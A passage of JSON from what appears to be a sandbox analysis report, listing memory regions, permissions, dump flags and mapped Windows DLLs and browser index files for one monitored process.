"private_0x0000000000f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 16318464, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 41353215, "entry_point": 0, "filename": null, "id": "region_2179", "name": "private_0x0000000002730000", "norm_filename": null, "region_type": "private_memory", "start_va": 41091072, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41615359, "entry_point": 0, "filename": null, "id": "region_2180", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41615360, "type": "region", "version": 1 }, "end_va": 41877503, "entry_point": 0, "filename": null, "id": "region_2181", "name": "private_0x00000000027b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41615360, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42139648, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_2182", "name": "private_0x0000000002830000", "norm_filename": null, "region_type": "private_memory", "start_va": 42139648, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42729471, "entry_point": 0, "filename": null, "id": "region_2183", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42860544, "type": "region", "version": 1 }, "end_va": 43122687, "entry_point": 0, "filename": null, "id": "region_2184", "name": "private_0x00000000028e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42860544, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 43843583, "entry_point": 0, "filename": null, "id": "region_2185", "name": "private_0x0000000002990000", "norm_filename": null, "region_type": "private_memory", "start_va": 43581440, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130292736, "type": "region", "version": 1 }, "end_va": 2130305023, "entry_point": 0, "filename": null, "id": "region_2186", "name": "private_0x000000007ef9b000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130292736, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_2187", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_2188", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_2189", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_2190", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2191", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2192", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2193", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:03:34.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_2219", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:03:35.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1941045248, "type": "region", "version": 1 }, "end_va": 1942740991, "entry_point": 1941045248, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_2220", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1941045248, "timestamp": "00:03:35.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 1507328, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_2276", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:03:35.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_2277", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:03:35.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_2278", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:03:35.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1959460864, "type": "region", "version": 1 }, "end_va": 1959505919, "entry_point": 1959460864, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_2279", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1959460864, "timestamp": "00:03:35.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2015231, "entry_point": 1966080, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_2280", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1966080, "timestamp": "00:03:35.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2588671, "entry_point": 2555904, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_2281", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:03:35.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 2621440, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_2282", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2621440, "timestamp": "00:03:35.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1972129791, "entry_point": 1971912704, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2283", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:03:35.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1998848000, "type": "region", "version": 1 }, "end_va": 1998872575, "entry_point": 1998848000, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2284", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1998848000, "timestamp": "00:03:35.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2228224, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_2285", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:03:35.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1955921920, "type": "region", "version": 1 }, "end_va": 1956200447, "entry_point": 1955921920, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_2286", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1955921920, "timestamp": "00:03:35.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_2287", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:03:35.722", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45809664, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_2288", "name": "private_0x0000000002bb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45809664, "timestamp": "00:03:35.722", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1955790848, "type": "region", "version": 1 }, "end_va": 1955905535, "entry_point": 1955790848, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_2289", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1955790848, "timestamp": "00:03:35.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1955725312, "type": "region", "version": 1 }, "end_va": 1955753983, "entry_point": 1955725312, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_2290", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1955725312, "timestamp": "00:03:35.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_2291", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:03:35.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 16056320, "type": "region", "version": 1 }, "end_va": 16318463, "entry_point": 0, "filename": null, "id": "region_2292", "name": "private_0x0000000000f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 16056320, "timestamp": "00:03:35.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 44367871, "entry_point": 0, "filename": null, "id": "region_2293", "name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:03:35.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_2294", "name": "private_0x0000000002a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 44630016, "timestamp": "00:03:35.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1955594240, "type": "region", "version": 1 }, "end_va": 1955688447, "entry_point": 1955594240, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_2295", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1955594240, "timestamp": "00:03:35.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 46071808, "type": "region", "version": 1 }, "end_va": 47120383, "entry_point": 0, "filename": null, "id": "region_2297", "name": "private_0x0000000002bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46071808, "timestamp": "00:03:35.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1992228864, "type": "region", "version": 1 }, "end_va": 1992413183, "entry_point": 1992228864, "filename": "\\Windows\\SysWOW64\\wintrust.dll", "id": "region_2298", "name": "wintrust.dll", "norm_filename": "c:\\windows\\syswow64\\wintrust.dll", "region_type": "memory_mapped_file", "start_va": 1992228864, "timestamp": "00:03:35.854", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 1954807808, "type": "region", "version": 1 }, "end_va": 1955045375, "entry_point": 1954807808, "filename": "\\Windows\\SysWOW64\\schannel.dll", "id": "region_2299", "name": "schannel.dll", "norm_filename": "c:\\windows\\syswow64\\schannel.dll", "region_type": "memory_mapped_file", "start_va": 1954807808, "timestamp": "00:03:35.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_2300", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:03:36.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5570559, "entry_point": 0, "filename": null, "id": "region_2301", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:03:36.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130280448, "type": "region", "version": 1 }, "end_va": 2130292735, "entry_point": 0, "filename": null, "id": "region_2302", "name": "private_0x000000007ef98000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130280448, "timestamp": "00:03:36.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1954414592, "type": "region", "version": 1 }, "end_va": 1954750463, "entry_point": 1954414592, "filename": "\\Windows\\SysWOW64\\rasapi32.dll", "id": "region_2303", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\syswow64\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1954414592, "timestamp": "00:03:36.103", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1954283520, "type": "region", "version": 1 }, "end_va": 1954369535, "entry_point": 1954283520, "filename": "\\Windows\\SysWOW64\\rasman.dll", "id": "region_2304", "name": "rasman.dll", "norm_filename": "c:\\windows\\syswow64\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1954283520, "timestamp": "00:03:36.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1955528704, "type": "region", "version": 1 }, "end_va": 1955581951, "entry_point": 1955528704, "filename": "\\Windows\\SysWOW64\\rtutils.dll", "id": "region_2305", "name": "rtutils.dll", "norm_filename": "c:\\windows\\syswow64\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1955528704, "timestamp": "00:03:36.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_2306", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:03:36.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_2307", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:03:36.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1954217984, "type": "region", "version": 1 }, "end_va": 1954242559, "entry_point": 1954217984, "filename": "\\Windows\\SysWOW64\\SensApi.dll", "id": "region_2308", "name": "sensapi.dll", "norm_filename": "c:\\windows\\syswow64\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1954217984, "timestamp": "00:03:36.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1954152448, "type": "region", "version": 1 }, "end_va": 1954217983, "entry_point": 1954152448, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_2311", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1954152448, "timestamp": "00:03:36.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1441792, "start_va": 47120384, "type": "region", "version": 1 }, "end_va": 48562175, "entry_point": 0, "filename": null, "id": "region_2312", "name": "private_0x0000000002cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47120384, "timestamp": "00:03:36.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1900544, "start_va": 48562176, "type": "region", "version": 1 }, "end_va": 50462719, "entry_point": 0, "filename": null, "id": "region_2313", "name": "private_0x0000000002e50000", "norm_filename": null, "region_type": "private_memory", "start_va": 48562176, "timestamp": "00:03:36.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1310720, "start_va": 47120384, "type": "region", "version": 1 }, "end_va": 48431103, "entry_point": 0, "filename": null, "id": "region_2314", "name": "private_0x0000000002cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47120384, "timestamp": "00:03:36.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 48496640, "type": "region", "version": 1 }, "end_va": 48562175, "entry_point": 0, "filename": null, "id": "region_2315", "name": "private_0x0000000002e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 48496640, "timestamp": "00:03:36.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_2316", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:03:36.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 40959999, "entry_point": 0, "filename": null, "id": "region_2317", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:03:36.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130268160, "type": "region", "version": 1 }, "end_va": 2130280447, "entry_point": 0, "filename": null, "id": "region_2318", "name": "private_0x000000007ef95000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130268160, "timestamp": "00:03:36.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1952645120, "type": "region", "version": 1 }, "end_va": 1952669695, "entry_point": 1952645120, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_2319", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1952645120, "timestamp": "00:03:36.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_2320", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:03:36.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41877504, "type": "region", "version": 1 }, "end_va": 42139647, "entry_point": 0, "filename": null, "id": "region_2321", "name": "private_0x00000000027f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41877504, "timestamp": "00:03:36.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43188224, "type": "region", "version": 1 }, "end_va": 43450367, "entry_point": 0, "filename": null, "id": "region_2322", "name": "private_0x0000000002930000", "norm_filename": null, "region_type": "private_memory", "start_va": 43188224, "timestamp": "00:03:36.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1970089983, "entry_point": 1969553408, 